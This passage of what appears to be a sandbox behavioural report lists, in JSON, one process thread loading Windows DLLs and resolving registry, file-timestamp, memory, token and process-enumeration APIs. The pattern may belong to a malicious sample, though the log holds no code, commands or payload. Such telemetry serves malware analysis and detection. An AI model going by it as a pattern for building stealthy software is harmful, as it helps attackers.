"return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MoveFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758799b0" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x0040a2a7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\shell32" }, { "name": "DllBase", "value": "0x75c40000" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407652", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75db1050" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407668", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040766b", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75ef7850" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040767e", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407681", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407691", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407694", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceec0" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076a1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076a4", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076b7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076ba", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecedf0" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076c7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076ca", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076d7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076da", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf100" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076e7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076ea", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076fb", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004076fe", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883380" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040770c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040770f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407720", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407723", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835f0" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407731", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407734", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837e0" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407742", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407745", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883a50" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407759", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040775c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833e0" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407770", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407773", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407781", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407784", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407798", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040779b", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077ae", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077b1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077be", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077c1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077ce", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077d1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "OpenProcessToken" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef40" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077e4", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077e7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "GetTokenInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceba0" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077fa", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004077fd", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "AllocateAndInitializeSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf4a0" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407810", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407813", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "EqualSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed07e0" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407826", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407829", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "LookupAccountSidA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ef8100" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040783c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 195 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040783f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040784c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 197 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040784f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407862", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 199 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407865", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407878", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040787b", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040788c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040788f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateToolhelp32Snapshot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a30" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078a3", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078a6", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758791e0" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078ba", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078bd", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877950" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078ce", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078d1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcbd0" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078e5", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078e8", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, 